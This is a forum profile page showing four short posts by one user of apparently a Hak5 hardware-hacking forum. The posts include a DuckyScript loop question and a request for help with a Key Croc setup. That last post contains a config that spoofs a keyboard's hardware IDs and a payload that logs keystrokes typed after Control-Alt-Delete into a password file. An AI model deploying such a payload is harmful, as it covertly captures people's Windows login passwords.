Jump to content

WizIs

Members
  • Posts

    4
  • Joined

  • Last visited

Everything posted by WizIs

  1. I've bought about 4 items and received all.
  2. How can I correct this to print "Hello 1 VAR $COUNT = 1 WHILE ( $COUNT < 10 ) STRINGLN Hello $COUNT $COUNT = ( $COUNT + 1 ) END_WHILE
  3. It should be noted I also 'updated' the version to try to resolve this and the error persisted.
  4. Hi, I am using 1.3_510 and HWID cloning AND hardware override isn't working. Below is my configuration. I read that ATTACKMODE may be able to help, so I added a payload.txt too. How should I go about to resolve this? ./config.txt: #!/bin/bash ####################################### # _-^^-_ # # ---=>====<^^.. # # " " Key Croc by Hak5 # ####################################### #This configuration file is used to set default variables DUCKY_LANG us SSH ENABLE WIFI_SSID iPhone WIFI_PASS password VID VID_0X0A5C PID PID_0X3025 ---- ./payloads/win10_grab.txt ATTACKMODE STORAGE HID VID_0X0A5C PID_0X3025 MAN_LITE-ON SN_0 PROD_Keyboard MATCH \[CONTROL-ALT-DELETE\] SAVEKEYS /root/loot/password.log UNTIL \[ENTER\]
×
×
  • Create New...